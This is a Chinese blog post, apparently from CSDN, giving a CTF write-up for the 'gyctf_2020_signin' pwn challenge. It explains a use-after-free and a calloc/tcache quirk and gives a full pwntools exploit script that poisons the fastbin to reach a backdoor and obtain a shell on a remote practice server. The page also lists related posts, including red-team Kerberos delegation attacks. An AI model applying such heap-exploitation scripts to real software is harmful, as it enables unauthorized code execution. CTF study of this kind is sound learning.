gyctf_2020_signin

最新推荐文章于 2024-06-23 15:19:47 发布
最新推荐文章于 2024-06-23 15:19:47 发布
阅读量380 收藏
点赞数
分类专栏: PWN 文章标签: 安全 unix 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57754423/article/details/124051300
版权

漏洞:uaf

新知识:

calloc函数会直接绕过tcache从fastbin中取,后门函数中又backdoor并且向其中写入数据1,所以我们只需有吧target的地址链入fastbin即可getshell

exp:

from pwn import *
from LibcSearcher import * 

local_file  = './signin'
local_libc  = './libc-2.27.so'
# remote_libc = './libc-2.23.so'

context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
e = ELF(local_file)
context.arch = e.arch

select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn', 28883)
    libc = ELF(local_libc)

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.slafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims			    :r.recvuntil(delims)
uu32    = lambda data               :u32(ru(data)[-4:].ljust(4, b'\0'))
uu64    = lambda data               :u64(ru(data)[-6:].ljust(8, b'\0'))
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))


def dbg():
	gdb.attach(r)
	pause()

menu = 'your choice?'

def add(index):
    sa(menu, '1')
    sa('idx?', str(index))

def edit(index, content):
    sa(menu, '2')
    sa('idx?', str(index))
    sl(content)

def delete(index):
    sa(menu, '3')
    sa('idx?', str(index))

chunk_ptr = 0x4040E0
target = 0x4040C0
flag = 0x404160
edit_cnt = 0x4040BC
add_cnt = 0x404088

for i in range(8):
	add(i)
for i in range(8):
	delete(i)
add(8)
edit(7,p64(target-0x10))

sa(menu, '6')




r.interactive()

cut_maize
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
gyctf_2020_signin(calloc特性,uaf,tcache特性)
m0_51251108的博客
11-04 466
gyctf_2020_signin: 参考师傅:yongbaoii 逆向分析: 主界面: 三个功能,add,edit,free,还有个backdoor add函数: edit函数: free函数: 有个标记检查,doublefree不能用了 backdoor: 还有个calloc函数 这里分配一个0x70大小的chunk calloc 有以下特性 不会分配 tcache chunk 中的 chunk 。 tcache 有以下特性 在分配 fastbin 中的 chunk 时若还有其他相同大
【pwn】 gyctf_2020_borrowstack
Nothing
03-02 1613
例行检查 程序逻辑 看到buf缓冲区有0x10大小溢出,且可以控制bss段上的bank,可以用栈迁移做,这题的bss段离got表较近,在迁移时尽量往高地址迁移,防止在rop时破坏got表上数据。 from pwn import * io=remote('node3.buuoj.cn','29302') bank=0x0601080 leave=0x400699 puts_plt=0x0400...
BUUCTF-PWN刷题记录-7
weixin_44145820的博客
04-15 878
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
BUUCTF:[GYCTF2020]EasyThinking
末初的CSDN博客
03-28 3453
参考:https://www.cnblogs.com/yesec/p/12571861.html 目录扫描,存在源码泄露www.zip ThinkPHP框架 ThinPHPV6.0.0 漏洞成因:ThinkPHP6任意文件操作漏洞分析 session可控,修改session,长度为32位,session后缀改为.php(加上.php后为32位) 然后再search搜索的内容会直接保存在/ru...
PhoneX_NO_CHECK_v2.2.7_release_2020-10-12_227_jiagu_sign.apk.1.apk
09-18
PhoneX_NO_CHECK_v2.2.7_release_2020-10-12_227_jiagu_sign.apk.1.apk
sign_javascript_开源_SiGN标记_消息机制_2020_
10-03
Sign 标记事件管理器## 版本 * v1.0 2020/5/22
SSO.rar_The Sign
09-19
Java Based IEEE Project Single Sign on Mechnanism. as per the paper we use RSA Algorithm. Zebros Successfully implement this task.
MATLAB.rar_sign language
09-22
比较全的MATLAB常用指令表与MATLAB软件符号语言工具箱,方便大家使用。
sq.rar_sign function
09-20
舌签功能 舌签功能 舌签功能 舌签功能
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&Kerberos&委派安全&非约束系&约束系&RBCD资源系&Spooler利用
HACKONE的博客
06-23 92
机器A(域控)访问具有非约束委派权限的机器B的服务,会把当前认证用户(域管用户)的的TGT放在ST票据中,一起发送给机器B,机器B会把TGT存储在lsass进程中以备下次重用。简而言之,非约束委派是指用户账户将自身的TGT转发给服务账户使用。委派是一种域内应用模式,是指将域内用户账户的权限委派给服务账号,服务账号因此能以用户的身份在域内展开活动(请求新的服务等),类似于租房中介房东的关系去理解。攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的TGT,从而模拟域管用户。
在物联网设备安全中,如何有效进行固件更新管理?
2403_84237550的博客
06-17 434
• 更新后持续监控设备状态,评估更新效果,及时发现并解决更新带来的新问题。在物联网设备安全中,有效进行固件更新管理是一个关键环节,涉及到多个步骤和策略,以确保更新过程既安全又高效。• 在部署固件更新前,进行全面的安全验证和兼容性测试,确保更新包的来源可靠,未被篡改,并且不会影响设备的正常运行。• 记录每次固件更新的详细信息,包括更新时间、版本号、更新内容和操作人员等,以便追溯和审计。• 加强用户对固件更新重要性的认识,教育用户如何正确执行和验证更新,提升整体安全意识。
【安全】Linux Fanotify使用入门
追寻梦想的青春
06-19 829
fanotify是另一种文件监控机制,在使用上两者类似,都是先调用init函数初始化句柄,然后调用类似watch的函数添加监控路径,再使用select+read的方式读取出变化的事件,根据事件中给出的参数获取文件的路径、事件类型以及其他需要的数据。如果是监控主机上的路径,directed结合FAN_EVENT_ON_CHILD标志就只能监控目录以及目录下的文件,per-mount可以监控pathname所在的挂载点中所有文件或者目录的变化,而global模式可以监控整个文件系统。
企业防盗版,如何保障上网安全
shenxinda_lu的博客
06-20 311
当需要访问互联网时,用户在隔离沙盒内进行操作,确保主机与互联网物理隔离,只有沙盒能够访问互联网,且沙盒与本机隔离。
如何隐藏真实的MAC地址和IP地址,保证多账户的安全?
vmlogin888的博客
06-18 558
在计算机网络中,MAC地址(Media Access Control Address)和IP地址(Internet Protocol Address)是两个重要的概念,用于网络设备之间的通信。虽然它们都用于标识设备,但在运作原理和作用上有着明显的区别。
网络协议安全:TCP/IP协议栈的安全问题和解决方案
wangyuxiang946的博客
06-18 2515
TCP/IP协议栈的安全问题和解决方案
HSE在企业中的重要性:健康、安全与环境的全面保障
shuntian88的博客
06-18 504
通过健康风险评估、安全培训、风险管理和环境保护措施,企业不仅保障员工的健康和安全,还推动环境的可持续发展。定期监测员工的健康状况,及时发现和处理与工作环境相关的健康问题,预防职业病,确保员工保持良好的身体状态,提高工作效率和满意度。系统化的风险评估和管理,预防健康、安全和环境风险,减少事故和职业病的发生,保障员工和环境的安全。通过有效的HSE管理,企业在员工、社会和环境之间实现良好平衡,促进各方利益的共同发展。健康安全的工作环境和高效的资源管理,提升员工工作效率,优化企业运营流程。HSE管理的综合效益。
Java中的加密与解密:实现安全的数据传输
最新发布
java666668888的博客
06-23 334
大家好,我是免费搭建查券返利机器人省钱赚佣金就用微赚淘客系统3.0的小编,也是冬天不穿秋裤,天冷也要风度的程序猿!在当今信息安全至关重要的时代,保护数据的安全性是每个开发人员都需要关注的重要议题。本文将深入探讨Java中的加密与解密技术,帮助你实现安全的数据传输。
餐饮食堂安全守护者:可燃气体报警器故障处理与检测要点解析
BDjiance的博客
06-17 426
在餐饮食堂中,可燃气体报警器的正常运行对于预防火灾和保障人员安全至关重要。接下来,佰德将围绕可燃气体报警器的故障现象识别、原因排查、安全操作准则、专业工具与备件、故障处理步骤、验证与测试以及维护与保养建议等方面进行详细阐述,帮助相关人员更好地应对可燃气体报警器故障。
GoogleSignInOptions.DEFAULT_SIGN_IN
06-07
`GoogleSignInOptions.DEFAULT_SIGN_IN` 是一个 `GoogleSignInOptions` 对象的常量,默认情况下,它包含请求用户的基本资料信息和 ID Token,以进行 Google 登录。这个常量是使用 `GoogleSignInOptions.Builder` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值